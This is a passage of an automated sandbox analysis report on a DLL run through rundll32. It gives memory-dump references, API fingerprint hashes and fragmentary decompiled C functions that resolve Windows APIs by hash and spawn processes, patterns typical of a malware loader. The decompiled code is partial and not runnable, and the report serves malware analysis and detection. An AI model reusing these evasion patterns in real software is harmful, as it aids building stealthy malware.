                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t81;
                  				void* _t82;
                  				void* _t83;
                  				long long* _t84;
                  				void* _t104;
                  				long long _t108;
                  				void* _t111;
                  				void* _t112;
                  				void* _t121;
                  				int _t123;
                  				int _t126;
                  				void* _t129;
                  				CHAR* _t131;
                  
                  				_t81 = __rax;
                  				 *((long long*)(_t111 + 8)) = __rbx;
                  				 *((long long*)(_t111 + 0x18)) = _t108;
                  				 *((long long*)(_t111 + 0x20)) = __rsi;
                  				_t112 = _t111 - 0x1c0;
                  				_t109 =  *0x8000d4a0;
                  				r14d = 0;
                  				 *(_t112 + 0x1f8) = lstrlenA(_t131);
                  				memset(_t129, _t126, _t123);
                  				_t6 = _t104 + 1; // 0x1
                  				_t7 = _t129 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t104, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t121 = _t104;
                  				if (_t121 == _t104) goto 0x800021d9;
                  				_t8 = _t121 + 1; // 0x1
                  				 *_t121 = dil;
                  				if (_t8 == _t104) goto 0x800021d9;
                  				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(__rdx + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t81 == _t104) goto 0x800021f5;
                  				 *_t81();
                  				goto 0x800021f8;
                  				_t82 = _t104;
                  				if (_t82 != _t104) goto 0x8000224d;
                  				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t104) goto 0x8000221e;
                  				 *_t82();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t82 == _t104) goto 0x80002241;
                  				 *_t82();
                  				goto 0x80002244;
                  				_t83 = _t104;
                  				if (_t83 != _t104) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t84 =  *((intOrPtr*)(_t83 + 0x18));
                  				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t84 == _t104) goto 0x80002279;
                  				 *_t84();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				signed long long _t88;
                  				long _t111;
                  				void* _t114;
                  				long _t117;
                  				void* _t121;
                  				void* _t122;
                  				long _t130;
                  				void* _t133;
                  
                  				 *((long long*)(_t121 + 0x18)) = __rbx;
                  				_t122 = _t121 - 0x30;
                  				_t88 =  *0x8000d4a0;
                  				r13d = 0;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t122 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t122 + 0x60) = 4;
                  				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e56;
                  				 *_t88();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e9d;
                  				_t10 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t10;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t122 + 0x68) = r13d;
                  				 *(_t122 + 0x60) = r13d;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005eea;
                  				_t19 = _t122 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t19;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t133, _t130, _t111);
                  				if (_t88 == _t133) goto 0x80005fad;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005f43;
                  				_t27 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t27;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005f46;
                  				if (r13d == r13d) goto 0x80005f95;
                  				 *(_t122 + 0x60) =  *(_t122 + 0x60) >> 1;
                  				 *((intOrPtr*)(_t88 + _t88 * 2)) = r13w;
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t114, _t117);
                  				if (_t88 == _t133) goto 0x80005f8e;
                  				r8d =  *(_t122 + 0x60);
                  				r8d = r8d + 1;
                  				wcstombs(??, ??, ??);
                  				 *(__rcx + 0x20) = _t88;
                  				goto 0x80005f9d;
                  				goto 0x80005f9d;
                  				GetLastError();
                  				HeapFree(??, ??, ??);
                  				goto 0x80005fbc;
                  				goto 0x80005fbc;
                  				return GetLastError();
                  			}











                  0x180005df8
                  0x180005e04
                  0x180005e08
                  0x180005e19
                  0x180005e1f
                  0x180005e23
                  0x180005e2b
                  0x180005e31
                  0x180005e42
                  0x180005e4a
                  0x180005e52
                  0x180005e54
                  0x180005e5c
                  0x180005e6b
                  0x180005e73
                  0x180005e75
                  0x180005e7e
                  0x180005e81
                  0x180005e90
                  0x180005e99
                  0x180005e9b
                  0x180005ea3
                  0x180005ea9
                  0x180005eae
                  0x180005ebc
                  0x180005ec4
                  0x180005ec6
                  0x180005ecb
                  0x180005ece
                  0x180005ed1
                  0x180005edf
                  0x180005ee8
                  0x180005eea
                  0x180005ef8
                  0x180005f04
                  0x180005f13
                  0x180005f1b
                  0x180005f1d
                  0x180005f22
                  0x180005f28
                  0x180005f36
                  0x180005f3f
                  0x180005f41
                  0x180005f49
                  0x180005f56
                  0x180005f5a
                  0x180005f5f
                  0x180005f67
                  0x180005f73
                  0x180005f75
                  0x180005f80
                  0x180005f83
                  0x180005f88
                  0x180005f8c
                  0x180005f93
                  0x180005f95
                  0x180005fa5
                  0x180005fab
                  0x180005fb2
                  0x180005fce

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloc$ErrorFreeLastwcstombs
                  • String ID:
                  • API String ID: 4133724704-0
                  • Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
                  • Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
                  • Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 18%
                  			E00000001180003FCC(intOrPtr* __rcx) {
                  				void* __rbx;
                  				void* __rbp;
                  				long long* _t84;
                  				long long* _t85;
                  				void* _t87;
                  				intOrPtr* _t106;
                  				void* _t109;
                  
                  				_t84 =  *0x8000d4a0;
                  				_t106 = __rcx;
                  				 *(_t109 + 0x58) =  *(_t109 + 0x58) & 0;
                  				E0000000118000459C(0x3a7e805d, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000400e;
                  				 *_t84();
                  				goto 0x80004010;
                  				if (0 == 0) goto 0x80004151;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x8000414c;
                  				 *0x8000d028();
                  				if (0 != 0) goto 0x80004145;
                  				r8d = 0x1000;
                  				HeapAlloc(??, ??, ??);
                  				if (_t84 == 0) goto 0x80004133;
                  				E0000000118000459C(0x3cd8e449, _t84,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t84 == 0) goto 0x8000408d;
                  				r8d = 0x1000;
                  				r8d =  <  ?  *((void*)(_t109 + 0x50)) : r8d;
                  				 *_t84();
                  				goto 0x8000408f;
                  				if (0 == 0) goto 0x800040b7;
                  				r8d =  *(_t109 + 0x58);
                  				r9d = 0;
                  				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60))));
                  				 *((intOrPtr*)(_t85 + 0x20))();
                  				r11d =  *(_t109 + 0x58);
                  				 *((intOrPtr*)(_t109 + 0x50)) =  *((intOrPtr*)(_t109 + 0x50)) - r11d;
                  				if (0 == 0) goto 0x800040bf;
                  				goto 0x80004059;
                  				GetLastError();
                  				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
                  				E0000000118000459C(0x3a7e805d, _t85,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t85 == 0) goto 0x800040ef;
                  				 *_t85();
                  				goto 0x800040f1;
                  				if (0 == 0) goto 0x80004101;
                  				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
                  				goto 0x80004059;
                  				GetLastError();
                  				goto 0x80004110;
                  				HeapFree(??, ??, ??);
                  				if (0x102 != 0) goto 0x80004138;
                  				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
                  				goto 0x80004138;
                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
                  				goto 0x80004166;
                  				goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
                  				goto 0x80004166;
                  				if (GetLastError() != 0x2efe) goto 0x80004166;
                  				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
                  				return 0;
                  			}










                  0x180003fda
                  0x180003fe1
                  0x180003fef
                  0x180003ff7
                  0x180003fff
                  0x18000400a
                  0x18000400c
                  0x180004012
                  0x18000401c
                  0x18000402e
                  0x180004036
                  0x18000403e
                  0x180004047
                  0x180004053
                  0x180004062
                  0x18000406a
                  0x180004070
                  0x180004083
                  0x180004089
                  0x18000408b
                  0x180004091
                  0x180004098
                  0x18000409d
                  0x1800040a0
                  0x1800040a6
                  0x1800040a9
                  0x1800040ae
                  0x1800040b3
                  0x1800040b5
                  0x1800040b7
                  0x1800040cd
                  0x1800040d8
                  0x1800040e0
                  0x1800040eb
                  0x1800040ed
                  0x1800040f3
                  0x1800040fa
                  0x1800040fc
                  0x180004101
                  0x180004109
                  0x180004118
                  0x180004120
                  0x18000412a
                  0x180004131
                  0x180004140
                  0x180004143
                  0x18000414a
                  0x18000414c
                  0x18000414f
                  0x18000415e
                  0x180004160
                  0x180004172

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
                  • String ID:
                  • API String ID: 2540544816-0
                  • Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
                  • Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
                  • Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
                  				void* _t46;
                  				long _t52;
                  				void* _t54;
                  				signed long long _t67;
                  				long long _t69;
                  				signed long long* _t73;
                  				signed long long _t80;
                  				signed long long _t87;
                  				intOrPtr _t90;
                  				struct _FILETIME* _t91;
                  				void* _t98;
                  				void* _t103;
                  				signed long long _t104;
                  				signed long long* _t105;
                  
                  				_t103 = _t98;
                  				 *((long long*)(_t103 + 0x10)) = __rbx;
                  				 *((long long*)(_t103 + 0x18)) = __rsi;
                  				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
                  				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
                  				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
                  				_t73 = _a8;
                  				if (_t73 == 0) goto 0x8000925e;
                  				_t87 = _t73 + 0x18;
                  				 *(_t73 + 0x20) = _t87;
                  				_a8[3] = _t87;
                  				_a8[2] = __rcx;
                  				_a8[1] = __rdx;
                  				 *_a8 =  *_a8 | 0xffffffff;
                  				if (_t46 != 0) goto 0x80009327;
                  				GetSystemTimeAsFileTime(_t91);
                  				EnterCriticalSection(??);
                  				_t104 = __rcx + 0x88;
                  				_t80 =  *(_t104 + 8);
                  				_a8[3] = _t104;
                  				_a8[4] = _t80;
                  				 *_t80 =  &(_a8[3]);
                  				_t67 =  &(_a8[3]);
                  				 *(_t104 + 8) = _t67;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0x1");
                  				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
                  				_a8[6] = _t67;
                  				if (_a8[6] != 0) goto 0x80009331;
                  				_t52 = GetLastError();
                  				EnterCriticalSection(??);
                  				_t105 = _a8;
                  				_t69 =  *((intOrPtr*)(_t105 + 0x20));
                  				_t90 =  *((intOrPtr*)(_t105 + 0x18));
                  				 *_t69 = _t90;
                  				 *((long long*)(_t90 + 8)) = _t69;
                  				LeaveCriticalSection(??);
                  				asm("lock add dword [edi+0x40], 0xffffffff");
                  				if (_t52 == 0) goto 0x80009331;
                  				if (_a8 == 0) goto 0x80009331;
                  				E00000001180002770(_t54, _a8);
                  				return _t52;
                  			}

















                  0x1800091f8
                  0x1800091fb
                  0x1800091ff
                  0x180009208
                  0x180009214
                  0x18000921b
                  0x180009221
                  0x18000922b
                  0x18000922d
                  0x180009231
                  0x18000923a
                  0x180009243
                  0x18000924c
                  0x180009255
                  0x180009260
                  0x18000926a
                  0x180009274
                  0x18000927f
                  0x180009286
                  0x18000928a
                  0x180009293
                  0x1800092a0
                  0x1800092ac
                  0x1800092b0
                  0x1800092b4
                  0x1800092ba
                  0x1800092cf
                  0x1800092d9
                  0x1800092e7
                  0x1800092f3
                  0x1800092f5
                  0x1800092fb
                  0x180009300
                  0x180009304
                  0x18000930c
                  0x18000930f
                  0x180009313
                  0x180009319
                  0x180009320
                  0x18000932a
                  0x18000932c
                  0x180009342

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
                  • String ID:
                  • API String ID: 3478816279-0
                  • Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
                  • Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
                  • Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ByteCharErrorHeapLastMultiWide$AllocFree
                  • String ID:
                  • API String ID: 2267670476-0
                  • Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
                  • Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
                  • Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				intOrPtr _v40;
                  				long long _v56;
                  				void* _t32;
                  				intOrPtr _t33;
                  				void* _t55;
                  				WCHAR* _t63;
                  				WCHAR* _t66;
                  				CHAR* _t69;
                  
                  				_t32 = _t55;
                  				 *((long long*)(_t32 + 8)) = __rbx;
                  				 *((long long*)(_t32 + 0x10)) = __rbp;
                  				 *((long long*)(_t32 + 0x18)) = __rsi;
                  				 *((long long*)(_t32 + 0x20)) = __rdi;
                  				_t33 =  *0x8000d4a0;
                  				lstrlenA(_t69);
                  				lstrlenW(_t66);
                  				lstrlenW(_t63);
                  				r8d = __rbx + _t33 + 0x12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t33 == 0) goto 0x80009c2e;
                  				_v56 = __r8;
                  				__imp__wnsprintfW();
                  				r9d = 0;
                  				r8d = 0;
                  				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009c32;
                  				return _v40;
                  			}











                  0x180009b7c
                  0x180009b7f
                  0x180009b83
                  0x180009b87
                  0x180009b8b
                  0x180009b99
                  0x180009bb6
                  0x180009bbf
                  0x180009bca
                  0x180009bd9
                  0x180009bdf
                  0x180009beb
                  0x180009c00
                  0x180009c05
                  0x180009c0b
                  0x180009c0e
                  0x180009c17
                  0x180009c26
                  0x180009c2c
                  0x180009c52

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
                  • HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
                  • wnsprintfW.SHLWAPI ref: 0000000180009C05
                    • Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
                    • Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
                    • Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
                    • Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
                    • Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
                    • Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877
                  • HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
                  • String ID:
                  • API String ID: 3150570956-0
                  • Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
                  • Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
                  • Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

